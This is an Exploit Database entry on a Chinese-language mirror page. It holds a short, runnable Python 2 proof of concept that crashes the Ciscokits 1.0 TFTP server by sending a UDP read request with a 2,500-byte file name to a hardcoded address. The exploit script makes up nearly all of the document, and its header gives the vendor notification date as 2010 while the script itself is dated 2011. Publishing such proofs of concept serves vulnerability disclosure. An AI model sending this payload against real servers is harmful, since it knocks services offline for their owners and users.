Ciscokits 1.0 – TFTP Server File Name Denial of Service

• Exploit Database
• 15 阅读

• 作者： Craig Freyman
  日期： 2011-07-25
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17569/

• #!/usr/bin/python
  #Title: Ciscokits 1.0 TFTP Long Filename DoS
  #Author: Craig Freyman (@cd1zz)
  #Date: July 22, 2011
  #Software Link: http://www.certificationkits.com/tftpserver/tftpserver.zip
  #Tested on: Windows XP SP3
  #Vendor notified: July 22, 2010 - Vendor approved release of PoC on July 23, 2010. 
  #Notes: When a long file name read request is made the CPU will spike
  #and within about 20 seconds the TFTP service will crash.
  
  import socket,sys,time
  
  host = '192.168.133.128'
  port = 69
  
  try:
  	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  except:
  	print "socket() failed"
  	sys.exit(1)
  
  crash = "\x41" * 2500
  
  mode = "netascii"
  files = "a"
  print "File name READ crash"
  #seems to only work on a READ command = x01
  pwned = "\x00\x01" + crash + "\0" + mode + "\0"
  s.sendto(pwned, (host, port))
  time.sleep(2)